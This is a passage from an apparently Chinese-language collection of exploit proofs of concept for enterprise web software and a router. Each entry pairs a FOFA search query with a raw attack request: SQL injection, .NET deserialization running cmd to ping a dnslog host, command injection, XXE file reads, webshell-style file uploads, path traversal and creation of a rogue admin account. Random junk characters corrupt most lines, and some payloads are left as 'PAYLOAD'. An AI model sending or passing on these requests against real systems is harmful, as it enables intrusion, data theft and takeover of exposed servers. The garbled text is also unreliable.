User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.369 N/ g; }* \- z7 `& {8 @
Content-Type: application/json+ o, u8 z8 r& w5 e7 w* O4 V9 W p
2 E0 @$ e8 `$ C
{6 ^' p1 H0 N* e. I
"storeID":{
) h/ O. J7 x; k4 }/ j7 x5 ~/ G" I "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
{0 W1 m4 F# Y: D; n x: B "MethodName":"Start",- o$ B+ D3 ?0 D. P6 a2 F t8 F4 h
"ObjectInstance":{; Q: a& L/ Z# ]4 T; m" r% O2 S6 Q2 J
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) W) ~3 v/ U; ~/ }$ D& u "StartInfo": {. I* J% I. ?4 P. l+ Z0 D
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- o$ Q& b9 t' L, L! D$ S+ c# |- c2 S4 Z "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"' x/ z. Q. o5 S. h9 Y+ z1 C0 ~% @
}8 ?- ~+ v8 f, k4 N G
}
4 m8 s q. X" |( I }
! W+ V& i; s6 C}
' `7 h$ d; l' M8 ?$ \0 f
& I) Y9 c m" X! z3 V( c
* P) s- ?0 [0 ?9 n57. 畅捷通T+ keyEdit.aspx SQL注入5 w/ H/ R1 _+ @8 f
FOFA:app="畅捷通-TPlus"
" V U+ |" z: O+ Z" p% TGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
0 _( f) e1 K1 Q% q! b1 U$ _Host: host
. T' n& K" X+ i9 O8 Y" U( `$ ^User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 y0 z3 }2 k" ^. y' t9 ?4 [Accept-Charset: utf-8* x$ N* b) H r& U
Accept-Encoding: gzip, deflate
" W4 _2 r. I- }' GConnection: close
7 }9 q1 t" R X8 ?( P+ G3 p e4 q `. u5 T/ u- j
0 v5 I; f! u4 S
58. 畅捷通T+ KeyInfoList.aspx sql注入( I6 j+ S/ {% r1 R- G) s
FOFA:app="畅捷通-TPlus"
% G3 W8 M. F, }! P+ F* p6 iGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.13 F2 \3 D; D+ l4 b
Host: your-ip
$ n: @# z! x4 Y2 ?4 L8 p5 TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& \4 N7 m+ {9 B1 n
Accept-Charset: utf-8
0 M# K9 u! ~: {& G+ ?' EAccept-Encoding: gzip, deflate
0 e6 T% K, h6 mConnection: close2 J% |, H% _0 I: g; n
) t6 e3 h0 e0 i! [
, @/ t( R% }7 l+ M9 `" X
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行# \( s5 g: V/ ~( _6 ~; P4 H) ?
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"4 ?. E/ O& K* P6 T8 b, ]9 I2 f% W
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.12 p6 t, r- I7 k: L% h
Host: 192.168.86.128:9090) b( X" z, y. T. k: [: I
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
, H& v6 S3 y) V7 dConnection: close% ]7 ?$ p f0 s, E+ r4 U. Q3 _5 y
Content-Length: 1669
, z' x4 |0 u; f. g" ], g. zAccept: */*% G7 F3 R/ X% R
Accept-Language: en. a/ O0 r( a8 X$ A6 @4 L% D
Content-Type: application/x-www-form-urlencoded
( g, u% O X' L0 d1 F4 i+ EAccept-Encoding: gzip
) Z, G% p9 `1 C+ q
8 j( [1 I! M4 _4 ~% Y. E' B& PPAYLOAD6 }. h8 A* C- ^( [
D1 A# Q7 ^" L$ l% u0 q
9 w$ a7 g1 K& J2 W; F+ V
60. 百卓Smart管理平台 importexport.php SQL注入
7 H; ]( K1 W* O9 V7 z! z1 JFOFA:title="Smart管理平台": j& Y1 D) }( s& u( k1 M% Z
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1& X. c* Q8 U5 X: |# O
Host:. M* s/ w6 M \: @1 r; s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 M4 P& M" Q& h( A* n8 T) b/ h" d9 Q0 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 }! F, g/ z( d+ ]
Accept-Encoding: gzip, deflate
- p' U% T/ [2 g2 M' z# X! N0 cAccept-Language: zh-CN,zh;q=0.9
* `4 F* M3 L/ Q* ~, yConnection: close! K7 f L, B' a5 I& ]/ K
0 T8 l4 l6 |( A/ s! V
( O& W" y5 U: v& u1 i; x
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% A% C6 i5 B9 o4 j% ^
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
6 |/ H6 m' Z7 x- O$ a3 DPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
* t! s. s# g8 h2 O* Y5 e8 k7 `Host: x.x.x.x
- T) ` y: \ XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, f$ M5 P1 s* u
Connection: close
: ]1 v8 t& C5 Y% h$ X" @+ {( t, YContent-Length: 27
) f( v: y1 e& h. _1 MAccept: */*: Q3 ?( Y2 Q7 t9 k! G
Accept-Encoding: gzip, deflate" H h# e l8 R" u5 i; z/ C/ V
Accept-Language: en/ L. ]8 B+ g; w7 Z( `, m
Content-Type: application/x-www-form-urlencoded
3 \; ?( s8 d- f2 H& n5 ^
' u+ B$ W, R0 {) W% N/ Y; B8 x: o8uxssX66eqrqtKObcVa0kid98xa. l T2 N: M/ @0 @, d& x
: w. v6 ~! z8 e
3 U1 x+ `! O0 X% [/ y
62. IP-guard WebServer 远程命令执行
* D+ M+ v+ F) H9 {: _) UFOFA:"IP-guard" && icon_hash="2030860561"
) J; R {( x: [( X2 ZGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ n# k8 N: J6 l7 r: x2 h
Host: x.x.x.x
$ V1 K* {. u' ?* sUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36+ S! T/ y, u1 l* P
Connection: close$ @6 K% B5 O! E! z' p. r# {! ^7 x; O! L
Accept: */*+ u6 c! v9 A5 ^* r7 D
Accept-Language: en
; b" A' ]" k: w3 `# E6 G6 ~( o3 ^Accept-Encoding: gzip _* }; }8 Q: a7 U3 u. C) k
! R g3 B Y; E& F" E, O$ B5 \, f5 F1 ~3 I( h
访问9 q! o2 P, s& _) ~
1 K2 O& w3 K5 L( V. C) `GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.15 B8 H' W0 i3 }
Host: x.x.x.x
; ^# e: B3 |& u) D9 x" n
% O7 @2 b2 S5 V1 B H8 i! |
4 d0 d6 Z4 ]6 q" M' E" b* q63. IP-guard WebServer任意文件读取( P- ^/ n8 _6 F: T3 [
IP-guard < 4.82.0609.0
8 `9 F6 G. b/ I$ S8 ^ T |- c- sFOFA:icon_hash="2030860561"+ Q' S0 [5 F( m- v$ q
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1$ A* w, b! C0 [' w" q
Host: your-ip( b: u$ |* x3 J* C/ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 t2 l6 }* e7 T% |: o3 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) s! O7 I0 f: ^/ b
Accept-Encoding: gzip, deflate* P/ d6 S2 y7 z, _5 S) F
Accept-Language: zh-CN,zh;q=0.9
, R2 x: p+ f; ?0 k' _Connection: close
2 p6 _6 F5 K/ c6 HContent-Type: application/x-www-form-urlencoded
( I+ t) S8 w8 j$ a. p' x u/ _: s, d: {- {2 J$ D2 F4 _( O o) M# P
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
6 y3 h& D) A, Z; A- [0 j
s7 `( @# t* G64. 捷诚管理信息系统CWSFinanceCommon SQL注入
, o+ s, n" s9 wFOFA:body="/Scripts/EnjoyMsg.js"
% U& o x# U& F, _ }* I/ u! gPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1/ `/ J' Q2 s. P/ H6 k
Host: 192.168.86.128:9001
% [1 f3 I; l! MUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
* a( K2 e$ C. Z2 w2 R3 V) y) H4 \Connection: close
6 k8 D( ]) o: W% H; jContent-Length: 369
0 _, P6 h" {4 O1 c$ n1 XAccept: */*9 q( N2 M5 P: t
Accept-Language: en
( L; J f' S; E6 e$ HContent-Type: text/xml; charset=utf-85 d0 N; [, ^3 r3 P0 z: l6 J9 g5 A% Q
Accept-Encoding: gzip4 a! _2 {) L4 ?- F7 M1 M j
: H- k; f7 d! D# z<?xml version="1.0" encoding="utf-8"?>, |! W7 P: y! h" G8 n/ s N ^0 b
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 A; U0 }# f% r( Z1 s<soap:Body>
( S* k- P; V" {* Z <GetOSpById xmlns="http://tempuri.org/">
2 S8 c0 _/ i% b# }9 G+ P <sId>1';waitfor delay '0:0:5'--+</sId>2 L, _! Y2 @/ ?6 E1 w+ i; H- ~* d
</GetOSpById>
8 ?! k, j) t3 F0 I. | </soap:Body>
% c+ N, k3 y) V' j</soap:Envelope>- v# o( r$ U' _
9 I3 r5 q- k9 I: o/ u8 Y
" d( c w( O! m2 M0 x9 i65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过1 O7 ~0 H, O# G3 Z$ Z- @
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"/ [8 u' t. f: N
响应200即成功创建账号test123456/1234563 g% l4 q" C" X3 C$ y% ~" o, C
POST /SystemMng.ashx HTTP/1.15 z4 ^% G+ o, i
Host:- D% u( J$ ~9 \0 L! ~
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1): I# J' A+ A2 g% {* ^* R% E4 S9 t
Accept-Encoding: gzip, deflate
" p$ b" X6 h; q6 ~9 H. v1 iAccept: */*2 f' i' i3 m- s: Y& |9 }
Connection: close- B, J0 b, b3 F0 r0 l
Accept-Language: en5 H" A* F( S1 _2 r( Z7 f% E6 ^
Content-Length: 1749 Y2 D" F# n; ^& }4 Y. ~9 H
; L9 Y. b/ e. soperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
5 `) {6 Q4 u. p$ \3 f- {$ M" r9 J% i- F2 A
; M* g, H& B$ L! u. }' r
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
: ?9 Z* G3 k; i$ ?2 lFOFA:app="万户ezOFFICE协同管理平台"
6 w0 U! i0 ]* P, p/ W, Q8 {( }" J7 [0 g0 ]. v. t3 h2 m
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
, w6 M7 ?# h1 J; \0 `Host: x.x.x.x7 g2 Z. r6 ~: L% R) `) F6 t- N2 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36# k! ]- [& V0 n9 a
Connection: close
% ~( X& M: d# ^- _8 G' i, xAccept: */*6 Q1 i# `, J' i9 t' D
Accept-Language: en
' d5 ?% Q' ~' f6 R ?Accept-Encoding: gzip
5 f0 Y9 r0 U( X! Q* y
8 c0 \* c: A# K$ s9 H7 d- y# t0 _" I" e4 w: |1 ? s7 b2 u) w
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在8 C. n) ?# @; T! p& q3 t, M
; N8 L- j) e" `
67. 万户ezOFFICE wpsservlet任意文件上传
. r- Z7 C9 r1 j5 X6 U$ DFOFA:app="万户网络-ezOFFICE"
7 d* R9 q( ^5 J% j# qnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
( S/ r. h* C# a, fPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.17 t6 d' k4 _) W! R/ Q. H
Host: x.x.x.x
2 J t0 U& k' x8 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0& h8 J, U0 i% u) R* Q7 z' t
Content-Length: 173
. |7 L: B/ g- r) OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
4 m1 o. A9 U* g8 ^- YAccept-Encoding: gzip, deflate9 a' L0 S1 T/ D( B! R( N
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
. b* b4 |1 ]" bConnection: close
7 y8 f& K* {$ I7 O T) aContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
% g c. R+ u. P8 }DNT: 19 ~' V" o& J& R: H; S4 H* r
Upgrade-Insecure-Requests: 1: m# x# t9 ^4 q/ }
! o9 @: j9 B2 |. i
--ufuadpxathqvxfqnuyuqaozvseiueerp
! H- x' d1 c: o3 `4 S5 j: wContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
4 x5 h1 A( L( C# Z, Y! q/ H2 _: [( V% A! k
<% out.print("sasdfghjkj");%>
6 W m) N! g; ]6 s/ D--ufuadpxathqvxfqnuyuqaozvseiueerp--
7 B% n% F: a. R$ y* H8 v" E5 H
! g; D8 {; t4 @' ]文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
" n- _% C1 e( M3 t- ?& e* U/ R
: N4 `( Z' r- K* h0 k5 h68. 万户ezOFFICE wf_printnum.jsp SQL注入, w% d: D% U" b+ e. B _
FOFA:app="万户ezOFFICE协同管理平台"+ b c0 |4 z" o; }5 u
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
4 w1 Q! _- Z5 Z7 Y$ Q* [Host: {{host}}& c9 Z! A& A" C1 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36. n, \) Z: G- C1 g& [* ?. U2 p
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.89 u% _5 D8 Y# H, ^7 ?4 K! F- j
Accept-Encoding: gzip, deflate
0 Q; y6 Z* l7 i+ l# MAccept-Language: zh-CN,zh;q=0.9
N# s8 j$ J* M* |: w+ X& ZConnection: close
9 `; U7 `" Z' W4 n
2 c( I' @- x+ Y; v
( z8 G7 P# F0 V! @69. 万户 ezOFFICE contract_gd.jsp SQL注入; w2 Q) V% f* Z b0 b+ n; x( O$ q
FOFA:app="万户ezOFFICE协同管理平台"
% C' L! B7 U8 \7 N' E4 TGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1+ a/ U! A6 A7 F9 S) ]0 g9 R
Host: your-ip- b9 s- Z8 q2 K
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 X/ t/ t8 x9 K- ^Accept-Encoding: gzip, deflate
7 M+ S. @, Q" ], p, yAccept: */*; D8 y) x7 R1 g( F! |/ z
Connection: keep-alive
4 [3 P4 ~ y5 q" y& d: @" f
4 b* L9 S/ `. w M0 S* c- C. e% @, p7 m& I
70. 万户ezEIP success 命令执行: v2 m' t" y" l; ]/ W! b8 k! G
FOFA:app="万户网络-ezEIP"" U0 C5 e! ]$ b' \) |) t# L4 \; d) K+ n
POST /member/success.aspx HTTP/1.1% h9 M3 j' d% D; h& W4 y
Host: {{Hostname}}/ j _8 u% K+ Y9 A Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 P- N8 v8 j# rSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
: }7 N8 A0 ], N9 FContent-Type: application/x-www-form-urlencoded
1 E. l& U) K+ I8 I2 Y8 N4 w; VTYPE: C
+ ^! z8 }& B& Q/ BContent-Length: 167024 Y/ Z5 d0 ?. i3 P
" P' t) m! a4 t0 M* l% t/ `" A& R
__VIEWSTATE=PAYLOAD# ]& z( `7 ]# q; n% r% P- b5 I
: t0 L1 I1 m( x6 @0 Y5 P! {8 B4 u7 V; M+ N8 b, d
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入/ g# T% w) u4 m# c' R
FOFA:body="PM2项目管理系统BS版增强工具.zip"
7 g* K: |: f% l( p6 z ~GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1 q2 ~& _0 g+ S, ?9 u% ]
Host: x.x.x.xx.x.x.x
4 R o% c$ o1 r/ W. Z3 m. j. U& GUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
q# y- e# p h4 ~ ^2 c w) RConnection: close3 Q. Y! s! E, m6 O# [) g# @( C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 H5 B+ O' {0 {% _$ t) kAccept-Encoding: gzip, deflate L' q) w/ V8 S6 E8 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ y/ }2 _8 `1 S# ]( s/ W* x
Upgrade-Insecure-Requests: 1
1 y- {7 m: c% E# P: U1 X/ y7 W! ^# h8 | R. v C
9 L2 J( L: A; F% K" x5 `
72. 致远OA getAjaxDataServlet XXE
3 p1 C0 J: v2 i! }, O' n7 ZFOFA:app="致远互联-OA". g) u' R5 R3 _& P9 ^) e' M3 ^; ~
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.18 _+ I- v2 ?( J+ M
Host: 192.168.40.131:8099! W0 z( [7 U# x, d1 v1 U
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.365 J n) ?# F F4 s( X9 D8 ]3 @
Connection: close" M7 p/ ?% Y$ X! @! ~: v$ ?. }
Content-Length: 583
& f, @5 l L& `; G8 LContent-Type: application/x-www-form-urlencoded
" h5 G m1 q- ^4 b# t) y- EAccept-Encoding: gzip1 S5 ?5 P9 [- R& c! g$ Z6 u
/ p& X9 z0 ]3 p7 L8 cS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 d; G) o- E4 p1 k9 I8 N. {3 [2 U0 r# b
% j( n+ l: Y$ y2 v7 r. t& r! B4 i
73. GeoServer wms远程代码执行
/ X. e3 T$ d8 z: U, S. sFOFA:icon_hash=”97540678”( q; X0 ]5 f1 @) Y9 z! u; M
POST /geoserver/wms HTTP/1.1' n$ F: H7 F, w& b" m# Z
Host:, e, |' K, V* R. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 b, E" H% h* T" G6 |% L* Y3 FContent-Length: 1981$ q+ ?3 p$ B5 V/ A
Accept-Encoding: gzip, deflate
0 j3 d# v, v" s( V0 [+ f( LConnection: close/ n+ g- l* }" W3 Y2 Z
Content-Type: application/xml
/ ]3 N f5 E) w/ m6 wSL-CE-SUID: 30 e. y c8 S- D4 t
3 D2 r- t; D' n2 nPAYLOAD+ c+ _ }: {7 b; y% J
+ H4 U" x- I9 T: H8 M3 F; k! \- W. S, Q
74. 致远M3-server 6_1sp1 反序列化RCE( l3 {% ~4 ?8 n% h( W' [
FOFA:title="M3-Server"
+ d: {7 N/ h) {/ h9 M4 gPAYLOAD
4 H. P7 F5 W7 n* d4 L% W' o$ i/ R* ?; X: h9 P
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE' x8 W* Y: J% v! n0 \' `/ k8 X
FOFA:app="TELESQUARE-TLR-2005KSH"+ o7 a# M; b; b% O) D/ p
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1# @1 N3 N4 l1 ^5 c. \4 \
Host: x.x.x.x
7 J3 u8 H2 W8 Z% ~4 N! f% RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! h' ]4 G" s1 _9 M" B s
Connection: close
?/ ]. d" V: EAccept: */*
! O0 I$ z, N* R' Q# o# q9 K5 AAccept-Language: en' F% n& l! k7 [
Accept-Encoding: gzip
3 [ i& c7 P( I# G0 G- ^3 p, x8 K+ w7 k
0 I$ Y R" f7 m5 T: h! ]GET /cgi-bin/test28256.txt HTTP/1.15 w9 l( S' n8 @3 N0 R
Host: x.x.x.x2 C2 V4 Y9 y8 X
! z$ n# g! ~9 Z0 P$ u) x/ Z
, u& l- H. Q3 {) e0 G0 L76. 新开普掌上校园服务管理平台service.action远程命令执行0 B% Y8 a D: n: d3 P2 H; D5 m6 r% d
FOFA:title="掌上校园服务管理平台"* M* `& }/ _* u
POST /service_transport/service.action HTTP/1.14 l1 G; h P7 i( N
Host: x.x.x.x1 S& W: U& h7 V: O& p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
- q" U/ ?/ [3 u. o5 oConnection: close
, s0 O$ s" h4 BContent-Length: 211
! L& ]- { v/ X; hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* v7 i# [: p) O2 i( l, o( w
Accept-Encoding: gzip, deflate) z) F2 ~8 X% c' \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 {, M, T8 b2 ]# q" f: G) `
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A49 o8 b% o4 Q" k0 U5 Q
Upgrade-Insecure-Requests: 1
2 L4 }) E( H; `$ j5 f: o, x3 W% ^
{
a/ @: n* ?) w9 B/ W0 i4 h. K"command": "GetFZinfo",+ w. Z8 p5 l3 q3 K
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
3 ]0 v( g i/ Z5 I ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
0 L! u4 |- F" t}
) K1 A# _9 @& w3 M6 P
6 V0 ~2 ~% o4 `! w! l- I
' N! [: p; R5 ]GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
) f4 M2 B# S JHost: x.x.x.x
( o- X* W( V" A' v# t
' a, J( B6 D: Y8 W+ T% H6 \6 C* w( P' ~, c; b
+ M+ q1 ?" q- g77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 U% Y2 W' l- ]* J5 E
FOFA:body="F22WEB登陆"
; ~9 s; r- b; m2 \' {( kPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.18 I% q+ J% \! V
Host: x.x.x.x
, O# k4 Q3 A/ D3 K7 e9 V8 N9 `2 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: d$ _6 w3 @8 J6 [ M0 }
Connection: close& v/ d2 `$ v. X- e% G' {
Content-Length: 433
7 r& y, V z" J4 n* j2 F0 @Accept: */*
, O/ y8 Q( V" KAccept-Encoding: gzip, deflate) a5 g7 i: ^, ]( N5 t7 B1 D O7 n
Accept-Language: zh-CN,zh;q=0.9) G. D& F# [( ?1 y; o
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix) T; H! X9 c# _) Q" |
9 `- W% [( S! P# j3 k------------398jnjVTTlDVXHlE7yYnfwBoix# S- b$ h2 r% x: {' P
Content-Disposition: form-data; name="folder"
3 ^) `5 H; ^4 F2 m' E$ r
+ z9 Q6 H2 F$ S/ R: ^/upload/udplog
, ~) _$ p" o" p H: G! _6 W------------398jnjVTTlDVXHlE7yYnfwBoix
) Z" ]" `+ z9 _$ M! n. X3 m1 O( eContent-Disposition: form-data; name="Filedata"; filename="1.aspx"5 m* Z( w( p- f$ V
Content-Type: application/octet-stream& h* X1 ~- q) g6 s: A
! L, E+ N, n* A1 { r6 |1 Phello1234567$ K+ k/ l: Z5 g0 p4 d( `6 w) M& X
------------398jnjVTTlDVXHlE7yYnfwBoix
7 ^5 b4 X6 ^! L( d; dContent-Disposition: form-data; name="Upload"+ @ L* _" |! o/ e( e
' L! V9 H( V! `+ pSubmit Query
( x; [. M! |$ F, [------------398jnjVTTlDVXHlE7yYnfwBoix--# N: b) C5 o; \8 i9 o; m1 f" R
6 O$ I0 E% Y! Q: I. \
5 S& X0 K U$ o$ R, \
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传5 V' b _7 ?2 n2 C* f9 w
FOFA:icon_hash="2001627082"
) b# k: {3 L3 n% @; rPOST /Platform/System/FileUpload.ashx HTTP/1.1
- H! s. [6 `# ~7 Q0 F) a- bHost: x.x.x.x& M+ P6 `' `. o, _, R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ t8 f* o c$ E
Connection: close
9 C( V! _; W6 _6 I: E/ L4 gContent-Length: 336
% S t2 l5 k% c8 pAccept-Encoding: gzip$ B. X- m& x/ o2 q( g3 s9 Q9 @
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
# J+ U0 b, G' V5 g/ S& M. P/ @
2 H" o: z5 T* n3 S' }------YsOxWxSvj1KyZow1PTsh98fdu6l
- X; O1 U3 \0 Q5 w# T3 VContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"% _7 K. L9 ~7 R" x' D2 G2 w
Content-Type: image/png
0 J& v U/ J- [- _2 t
" @/ U7 |' x# X4 X+ p( [; `YsOxWxSvj1KyZow1PTsh98fdu6l
1 ]! j3 m# ]1 v3 D$ k0 S% U------YsOxWxSvj1KyZow1PTsh98fdu6l8 S0 I) d% H: }0 _* P
Content-Disposition: form-data; name="target"; R) P: _ Z, F8 f8 P
8 q, C" O- B" C2 v/Applications/SkillDevelopAndEHS/
. [! i, s3 t$ W------YsOxWxSvj1KyZow1PTsh98fdu6l--1 C/ Z1 e) l+ H1 G0 g
8 n+ `+ g& E# L
